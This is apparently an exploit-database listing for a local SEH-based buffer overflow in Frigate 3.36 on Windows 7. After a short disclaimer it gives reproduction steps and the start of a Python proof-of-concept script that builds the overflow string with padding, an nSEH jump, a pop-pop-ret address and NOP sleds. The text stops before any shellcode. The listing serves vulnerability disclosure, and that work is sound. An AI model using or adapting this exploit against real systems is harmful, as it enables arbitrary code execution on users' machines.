Exploits / Vulnerability Discovered : 2020-05-04 |
Type : local |
Platform : windows
This exploit / vulnerability Frigate 3.36 buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Frigate 3.36 - Buffer Overflow (SEH)
# Exploit Author: Xenofon Vassilakopoulos
# Date: 2020-05-03
# Version: 3.36
# Vendor Homepage: http://www.Frigate3.com/
# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
# Tested on: Windows 7 Professional SP1 x86
# Steps to reproduce :
# 1. generate the test.txt using this exploit
# 2. copy the contents of the test.txt to clipboard
# 3. open Frigate3 then go to Disk -> Find Computer
# 4. paste the contents to computer name
# 5. calculator will execute
import struct
filename = 'test.txt'
junk = "A"*4112
nseh = "\xeb\x1A\x90\x90"
seh = struct.pack('L',0x40171c45) # pop esi # pop ebx # ret
nop="\x90"*18
junk2 = "\x71\x71\x90\x90"